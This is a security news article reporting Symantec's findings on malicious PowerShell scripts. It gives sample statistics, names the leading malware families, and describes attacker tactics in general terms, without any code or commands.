While other applications are popular to leverage for an attack on a system, PowerShell is starting to take over as a powerful tool for malware developers.
Over 95 percent of scripts using PowerShell, the scripting language and shell framework installed by default on most Windows computers, ended up being malicious, according to a Symantec report.
The flexibility of the framework allows attackers to abuse it to download malicious payloads, perform reconnaissance operations, or traverse across networks, said researchers at Symantec.
And with 95.4 percent of the PowerShell scripts that Symantec analyzed being malicious, it’s clear they represent a major threat to consumers and businesses (especially when externally sourced PowerShell scripts are involved).
Of late, a lion’s share of targeted attacks used PowerShell scripts, researchers said.
The use of PowerShell allows for a fileless infection, and the actors behind banking Trojans and other type of threats started to adopt it as well.
Symantec researchers said they observed cases where Office macros and PowerShell scripts ended up used for payload download.
The most prevalent malware families currently taking advantage of PowerShell include W97M.Downloader (9.4 percent of all analyzed samples), Trojan.Kovter (4.5 percent), and JS.Downloader (4 percent), the security company notes in a report that focuses specifically on the use of PowerShell in attacks.
The numbers come from the Symantec Blue Coat Malware Analysis sandbox, which saw 49,127 PowerShell scripts submitted this year alone. The security researchers also manually analyzed 4,782 samples that represent 111 malware families that abuse the PowerShell command line.
The number of received samples increased sharply in 2016, mainly fueled by an increase in the activity of JS.Downloader and Kovter. In the second quarter of the year, Symantec’s sandbox received 14 times more PowerShell samples compared to the previous quarter, while the third quarter saw a 22 times increase compared to the second quarter.
Attackers mostly use their PowerShell scripts post-compromise, to download additional payloads, and they also employ various techniques to ensure the scripts are executed, such as the use of extensions others than .ps1, which is usually being blocked, , Symantec said.
Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload, Symantec said. Attackers use this convoluted infection method in an attempt to bypass security protections.
Apart from downloading payloads, malicious PowerShell scripts have performed various tasks such as uninstalling security products, detecting sandboxed environments, or sniffing the network for passwords.